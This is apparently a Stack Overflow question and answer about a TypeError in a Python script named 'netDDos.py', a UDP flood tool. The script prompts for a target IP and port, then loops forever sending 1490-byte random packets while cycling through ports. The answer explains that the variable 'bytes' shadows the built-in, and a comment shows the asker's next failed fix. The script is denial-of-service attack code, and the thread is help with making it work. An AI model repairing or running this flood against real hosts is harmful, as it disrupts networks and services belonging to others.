# TypeError: 'bytes' object is not callable when using sock.sendto()

Tags: python, python-3.x, sockets, byte, ddos

```py
import sys
import os
import socket
import random
import time
import ipaddress

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
print("\033[1;31;40m Executing netDDos.py")
os.system("clear")
print("\033[1;31;40m   ▄   ▄███▄     ▄▄▄▄▀ ██▄   ██▄   ████▄    ▄▄▄▄▄   ")
print("\033[1;31;40m    █  █▀   ▀ ▀▀▀ █    █  █  █  █  █   █   █     ▀▄ ")
print("\033[1;31;40m██   █ ██▄▄       █    █   █ █   █ █   █ ▄  ▀▀▀▀▄   ")
print("\033[1;31;40m█ █  █ █▄   ▄▀   █     █  █  █  █  ▀████  ▀▄▄▄▄▀    ")
print("\033[1;31;40m█  █ █ ▀███▀    ▀      ███▀  ███▀  ")                 
print("\033[1;31;40m█   ██  ")
print("Written by Hydra | lua")
print(" ")

ip = input("IP Target: ")
port = int(input("Port: "))

os.system("clear")
os.system("figlet Attack Starting")
print("[                    ] 0%")
time.sleep(1)
print("[====                ] 25%")
time.sleep(1)
print("[==========          ] 50%")
time.sleep(1)
print("[===============     ] 75%")
time.sleep(1)
print("[====================] 100%")
time.sleep(1)
sent = 0
while True:
    sock.sendto(bytes(int(ipaddress.IPv4Address(ip)), port))
    sent = sent + 1
    port = port + 1
    print("Sent %s packet to %s through port:%s"%(sent, ip, port))
    if port == 65534:
        port = 1
```

The error message is:

```
sock.sendto(bytes(int(ipaddress.IPv4Address(ip)), port)
TypeError: 'bytes' object is not callable
```

I'm pretty new to Python and it's my first time asking a question on StackOverflow. It's purpose is just experimenting with my local network.

Answer (score 0):

You've overwritten the built-in type `bytes` by giving your own variable that name. Call it something else.

(Actually I'm not sure why you defined that variable anyway, since you're not using it. You should just remove it.)

Comment: Thanks for the reply! I removed it & changed it to: sock.sendto(bytes(ipaddress.IPv4Address(ip), port)) and I changed port = int(input("Enter port: ")) to port = input("Enter port: ") Sadly there's a new error. Type Error: Encoding without a string